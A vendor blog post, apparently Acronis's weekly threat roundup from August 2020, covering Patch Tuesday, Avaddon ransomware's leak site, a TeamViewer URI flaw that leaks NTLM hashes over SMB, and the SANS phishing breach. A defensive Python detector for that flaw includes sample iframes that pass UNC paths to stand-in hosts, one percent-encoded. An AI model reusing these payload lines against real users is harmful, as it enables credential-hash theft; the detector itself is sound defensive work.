August 21, 2020
Eric Swotinsky

Cyberthreat update from Acronis CPOCs: Week of August 17, 2020

Here at Acronis, we’re always monitoring for dangers to your data, deploying updates to handle newly discovered vulnerabilities, and issuing alerts and recommendations to help you stay protected. Our global network of Acronis Cyber Protection Operations Centers (CPOCs) continues to work around the clock to proactively detect and defend against the latest cyberthreats.

Part of this work includes video updates to inform you of new hazards in the digital landscape — like newly discovered software vulnerabilities and malware attacks. Here’s a look at some of the most recent breaking news and analyses:

August Patch Tuesday continues trend of over 100 monthly bug fixes

Microsoft recently released updates to plug at least 120 security holes in its Windows operating system and supported software. Two of these were newly discovered zero-day vulnerabilities that were being actively exploited.

At least 17 of the bugs squashed in August address “critical” vulnerabilities, according to Microsoft’s own rankings. This marks the sixth month in a row in which Microsoft has released over 100 bug fixes.

As Microsoft continues to uncover large numbers of bugs and release critical patches on a regular basis, automatic patch management features like those in Acronis Cyber Protect are essential for safeguarding business-critical data.

Ransomware extortion site launched for leaked data

The Avaddon ransomware group has launched a data leak site and announced it on a Russian language cybercrime forum — making them the latest operation to seriously threaten to steal sensitive data and publicly release it if the victims fail to pay a ransom.

The operators behind Avaddon are actively recruiting new affiliates — attackers who receive a personalized version of the ransomware, tied to a unique affiliate ID, and share profits with the operators whenever a ransom is paid by victims.

With ransomware attacks escalating into data breaches, it’s important to have tools with integrated ransomware protection — like Acronis Cyber Protect — to detect and block modern cyberthreats, keeping your business-critical data private and secure.

TeamViewer vulnerability could leak passwords

The popular remote access tool TeamViewer recently patched a vulnerability in its Windows client that could leak your password to an attacker.

Exploiting this issue, attackers can create malicious websites that use TeamViewer’s specific URI to launch the application and provide it with an SMB path argument, which in turn sends the user’s NTLM password hash to the attacker. Cybercriminals can then brute force the victim’s login credentials and potentially take over their entire system.

This vulnerability has been fixed as of TeamViewer version 15.8.3, and all users are urged to immediately update their client to stay protected online. The vulnerability assessment and patch management features in Acronis Cyber Protect keep you safe by automatically monitoring for, and installing, patches to TeamViewer and other applications.
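A defensive check for the pattern described above, as an added example that is not code from Acronis or TeamViewer: it scans a page's HTML for links or frames that hand a non-browser URI scheme a UNC (SMB) path, including percent-encoded forms. The `exampleapp` scheme, the `--open` option and the sample hosts are constructed placeholders, not the real handler or argument names.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Schemes the browser handles itself; any other scheme is passed to a local app.
BROWSER_SCHEMES = {"http", "https", "mailto", "tel", "data", "javascript", "about", "blob"}
SCHEME_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9+.\-]*):(.*)$", re.S)
# \\host\share anywhere, or //host/share right after an argument boundary.
UNC_RE = re.compile(r"""(\\\\[\w.\-]+\\[^\s"'<>]+|(?<=[\s="'])//[\w.\-]+/[^\s"'<>]+)""")

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded backslashes are exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

class UriCollector(HTMLParser):
    """Collects (tag, value) for every href/src/action attribute."""
    def __init__(self):
        super().__init__()
        self.uris = []
    def handle_starttag(self, tag, attrs):
        self.uris += [(tag, v) for n, v in attrs if n in ("href", "src", "action") and v]

def find_unc_in_app_uris(html):
    """Return app-handler URIs in `html` whose arguments contain a UNC path."""
    collector = UriCollector()
    collector.feed(html)
    findings = []
    for tag, uri in collector.uris:
        m = SCHEME_RE.match(uri)
        if not m or m.group(1).lower() in BROWSER_SCHEMES:
            continue
        unc = UNC_RE.search(fully_unquote(m.group(2)))
        if unc:
            findings.append({"tag": tag, "scheme": m.group(1).lower(), "unc": unc.group(1)})
    return findings

# Constructed sample page: 'exampleapp' and '--open' are hypothetical placeholders.
SAMPLE_HTML = """
<a href="exampleapp://open/session?id=1">benign deep link</a>
<iframe src="exampleapp: --open \\\\198.51.100.7\\share\\clip.x"></iframe>
<iframe src="exampleapp:%20--open%20%255C%255Cfiles.example.net%255Cs%255Cy"></iframe>
"""
if __name__ == "__main__":
    print(find_unc_in_app_uris(SAMPLE_HTML))
```

The check only covers URIs in `href`, `src` and `action` attributes; URIs assembled in script at run time need inspection at the proxy or endpoint instead.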

SANS suffers data breach after phishing attack

The SANS Institute, a cybersecurity training organization, has disclosed a security incident which resulted in 28,000 records of personally identifiable information (PII) being forwarded to an unknown email address. A phishing email was found to be the initial attack vector, compromising just a single employee’s account.

Before the leak was identified, a total of 513 emails were forwarded to an external account. While the majority of these did not contain important data, some did include files with information such as first and last names, phone numbers, email and physical addresses, employers, and industries.

The SANS Institute is renowned for its excellent cybersecurity instructors, training, and certifications. No matter who you are — or how vigilant you tend to be in watching out for phishing scams — breaches can still happen. URL filtering capabilities, such as those in Acronis Cyber Protect, automatically block access to malicious URLs and keep your systems safe.

# # #

For the latest reports on emerging cyberthreats from Acronis’ cyber protection experts, subscribe to the Acronis YouTube channel and receive our CPOC updates as they’re posted.